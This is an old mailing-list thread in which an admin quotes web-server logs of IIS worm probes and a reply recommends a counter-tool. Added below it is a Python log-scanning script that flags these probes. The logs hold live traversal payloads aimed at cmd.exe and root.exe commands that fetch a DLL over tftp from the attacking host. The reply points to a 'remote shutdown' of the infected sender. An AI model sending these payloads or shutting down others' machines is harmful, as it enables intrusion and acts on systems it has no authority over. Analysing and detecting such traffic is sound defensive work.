Ibly Piblo wrote:
>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point across?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "
>
That is no DoS attack--tis the wailing of IIS infected trying to spread its misery.

Go here... Tis time to meet a friend.
http://pfortin.com/Linux/MSVTS/
And yes the remote shutdown is there.

While you are at it, you might want to make some more new friends
http://plf.zarb.org

Civileme
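Added example, not part of the original thread and not code from the tool linked in the reply: a Python pass over Apache access-log lines that recognises the probe patterns in the quoted log (double percent-encoding, overlong UTF-8 separators, requests for `cmd.exe`/`root.exe`/`httpodbc.dll`) and lists, per source host, which probes were answered with a 2xx status. The first three sample lines are copied from the quoted log; the `192.0.2.10` line and all function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
TARGETS = (b"cmd.exe", b"root.exe", b"httpodbc.dll")
# Overlong UTF-8 byte pairs that appear in the quoted log in place of '/' or '\'
OVERLONG = (b"\xc0\xaf", b"\xc0\x2f", b"\xc1\x1c", b"\xc1\x9c")

def decode_fully(target, rounds=3):
    """Percent-decode repeatedly, so %255c -> %5c -> backslash."""
    raw = target.encode("latin-1")
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)  # invalid escapes such as '%%' are left as-is
    return raw

def classify(target):
    """Reasons a request target looks like an IIS worm probe (empty if none)."""
    raw = decode_fully(target).lower()
    checks = {
        "iis-binary": any(t in raw for t in TARGETS),
        "traversal": b"../" in raw or b"..\\" in raw,
        "overlong-utf8": any(o in raw for o in OVERLONG),
    }
    return [name for name, hit in checks.items() if hit]

def summarize(lines):
    """Per source host: probe count, reasons seen, probes answered 2xx."""
    report = defaultdict(lambda: {"probes": 0, "reasons": set(), "answered": []})
    for m in filter(None, map(LOG_RE.match, lines)):
        host, target, status = m.groups()
        reasons = classify(target)
        if reasons:
            report[host]["probes"] += 1
            report[host]["reasons"].update(reasons)
            if status.startswith("2"):
                report[host]["answered"].append(target)
    return dict(report)

# Three lines from the quoted log, plus one constructed benign request
SAMPLE = [
    '65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"',
    '65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"',
    '65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"',
    '192.0.2.10 - - [28/Jul/2002:18:02:00 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

On a server that is not IIS these requests cannot reach the binaries they ask for, so the 404 and 400 lines are noise; the `answered` list is the part to check, since it shows which probe URLs the local server replied to with 2xx and what it actually served there.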